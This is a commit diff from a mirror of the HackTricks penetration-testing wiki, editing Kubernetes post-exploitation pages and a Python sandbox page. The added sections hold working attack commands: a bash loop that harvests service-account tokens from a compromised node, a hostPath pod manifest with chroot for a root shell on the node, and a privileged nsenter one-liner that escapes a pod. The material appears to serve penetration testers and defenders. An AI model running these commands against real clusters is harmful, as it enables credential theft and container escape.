mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 12:13:17 +00:00
GitBook: [#2911] No subject
This commit is contained in:
parent
086406e0d1
commit
8a0c6374c5
5 changed files with 98 additions and 36 deletions
|
@ -830,31 +830,7 @@ f(42)
|
|||
|
||||
## Decompiling Compiled Python
|
||||
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
|
||||
|
||||
**Check out this tutorial**:
|
||||
|
||||
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
|
||||
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Misc Python
|
||||
|
||||
### Assert
|
||||
|
||||
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
|
||||
Therefore, checks like
|
||||
|
||||
```python
|
||||
def check_permission(super_user):
|
||||
try:
|
||||
assert(super_user)
|
||||
print("\nYou are a super user\n")
|
||||
except AssertionError:
|
||||
print(f"\nNot a Super User!!!\n")
|
||||
```
|
||||
|
||||
will be bypassed 
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
|
||||
|
||||
## References
|
||||
|
||||
|
@ -863,4 +839,3 @@ will be bypassed 
|
|||
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
|
||||
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
|
||||
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
|
||||
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
|
||||
|
|
|
@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
|
|||
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Labs to practice and learn
|
||||
|
||||
* [https://securekubernetes.com/](https://securekubernetes.com)
|
||||
* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
|
||||
|
|
|
@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
|
|||
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
If you managed to escape from the container there are some interesting things you will find in the node:
|
||||
|
||||
* The **Kubelet** service listening
|
||||
* The **Kube-Proxy** service listening
|
||||
* The **Container Runtime** process (Docker)
|
||||
* More **pods/containers** running in the node you can abuse like this one (more tokens)
|
||||
* The whole **filesystem** and **OS** in general
|
||||
|
||||
### Abusing Kubernetes Privileges
|
||||
|
||||
As explained in the section about **kubernetes enumeration**:
|
||||
|
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
|
|||
## Automatic Tools
|
||||
|
||||
* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
|
||||
|
||||
## Node Post-Exploitation
|
||||
|
||||
If you managed to **escape from the container** there are some interesting things you will find in the node:
|
||||
|
||||
* The **Container Runtime** process (Docker)
|
||||
* More **pods/containers** running in the node you can abuse like this one (more tokens)
|
||||
* The whole **filesystem** and **OS** in general
|
||||
* The **Kube-Proxy** service listening
|
||||
* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
|
||||
|
||||
```bash
|
||||
# Check Kubelet privileges
|
||||
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
|
||||
|
||||
# Steal the tokens from the pods running in the node
|
||||
## The most interesting one is probably the one of kube-system
|
||||
ALREADY="IinItialVaaluE"
|
||||
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
|
||||
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
|
||||
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
|
||||
ALREADY="$ALREADY|$TOKEN"
|
||||
echo "Directory: $i"
|
||||
echo "Namespace: $(cat $i)"
|
||||
echo ""
|
||||
echo $TOKEN
|
||||
echo "================================================================================"
|
||||
echo ""
|
||||
fi
|
||||
done
|
||||
```
|
||||
|
|
|
@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
|
|||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
****
|
||||
### **Get Pods consumptions**
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="kubectl" %}
|
||||
```
|
||||
./kubectl top pod --all-namespaces
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
### Escaping from the pod
|
||||
|
||||
|
|
|
@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:
|
|||
|
||||
![](<../../.gitbook/assets/image (464).png>)
|
||||
|
||||
### **Pod Creation - Mount Root (pod escape)**
|
||||
### **Pod Creation & Escape - Mount Root**
|
||||
|
||||
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
|
||||
|
||||
|
@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml
|
|||
|
||||
And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
|
||||
|
||||
**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
|
||||
|
||||
1. Create a "hostpath volume mount" `pod` manifest.
|
||||
|
||||
```
|
||||
cat > hostpath.yml <<EOF
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hostpath
|
||||
spec:
|
||||
containers:
|
||||
- name: hostpath
|
||||
image: busybox:latest
|
||||
command:
|
||||
- sleep
|
||||
- "86400"
|
||||
volumeMounts:
|
||||
- name: rootfs
|
||||
mountPath: /rootfs
|
||||
restartPolicy: Always
|
||||
volumes:
|
||||
- name: rootfs
|
||||
hostPath:
|
||||
path: /
|
||||
EOF
|
||||
```
|
||||
2. Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
|
||||
|
||||
```
|
||||
kubectl apply -f hostpath.yml
|
||||
```
|
||||
3. Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
|
||||
|
||||
```
|
||||
kubectl exec -it hostpath /bin/sh
|
||||
```
|
||||
4. Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
|
||||
|
||||
```
|
||||
chroot /rootfs /bin/bash
|
||||
```
|
||||
|
||||
### Pod Creation & Escape - Get into root pid ns
|
||||
|
||||
From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
|
||||
|
||||
```bash
|
||||
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
|
||||
```
|
||||
|
||||
### Sniffing **with a sidecar proxy app**
|
||||
|
||||
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
|
||||
|
|
Loading…
Reference in a new issue